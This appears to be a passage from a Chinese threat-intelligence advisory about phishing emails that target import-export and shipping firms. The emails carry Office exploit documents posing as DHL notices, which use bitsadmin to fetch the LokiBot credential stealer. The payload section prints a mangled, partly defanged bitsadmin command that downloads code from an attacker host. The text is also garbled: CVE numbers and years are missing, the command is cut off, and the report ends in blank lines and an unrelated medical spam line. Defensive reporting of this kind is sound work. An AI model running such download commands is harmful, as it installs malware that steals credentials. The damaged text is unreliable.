0x1背景腾讯御见威胁情报中心监测发现，近期针对中国进出口企业的网络攻击再次抬头。黑客攻击的目标是中国电子科技、外贸、远洋运输企业，攻击者发送精心准备的与企业业务相关的诱饵邮件，附件是利用Offic漏洞（漏洞编号：CVE--）特别定制的攻击文档，存在漏洞的电脑上打开附件会立刻中毒。漏洞触发后利用bitsadmin下载LokiBot木马并执行，然后窃取受害人员各类账号密码等机密信息。年12月5号，腾讯安全御见情报中心曾发布预警：一款针对外贸行业的“商贸信”病毒，利用CVE--漏洞的Word文档伪装成采购清单、帐单等文件，通过邮件在全球外贸行业内大量传播，仅一天时间国内就有约10万多国内用户收到此类钓鱼邮件。年2月26日捕获到doc文档样本通过下载并运行已被公开源码的“波尼”木马，窃取用户比特币钱包文件等敏感信息，这些攻击文档同样利用了CVE--漏洞。最新的拦截数据表明，此类定向投放到中国进出口企业的攻击邮件每天有数千封之多，病毒变种也层出不穷。腾讯安全专家建议中国进出口相关企业务必高度警惕，采用必要的防御措施防止企业机密信息泄露。

攻击流程图

0x2危害等级（高）利用精心伪造的攻击文档，植入高危漏洞攻击代码，实现对特定进出口企业的精准攻击，危害极大，可能导致商业机密泄露，企业内网被完全控制，会给受害企业带来严重经济损失。

0x3影响力腾讯御见威胁情报中心监测数据表明，每天拦截攻击邮件的数量上千次，攻击者的主要针对经营进出口业务的外贸型企业进行精准攻击，包括电子科技、远洋运输等等行业。

0x4载荷投递邮件附件中的doc

伪装成国际物流公司DHL发出的寄件包裹确认信。这类信针对运输业的从业人员诱惑性很高，很容易识别为运输合作伙伴的信件。

内容直译：

打开邮件doc文档，触发CVE--漏洞，执行命令行

cmd.x/cbitsadmin/transfrFq/priorityforgroundhxxp://intrnationalcon.







































白癜风的发病机理是什么
308治疗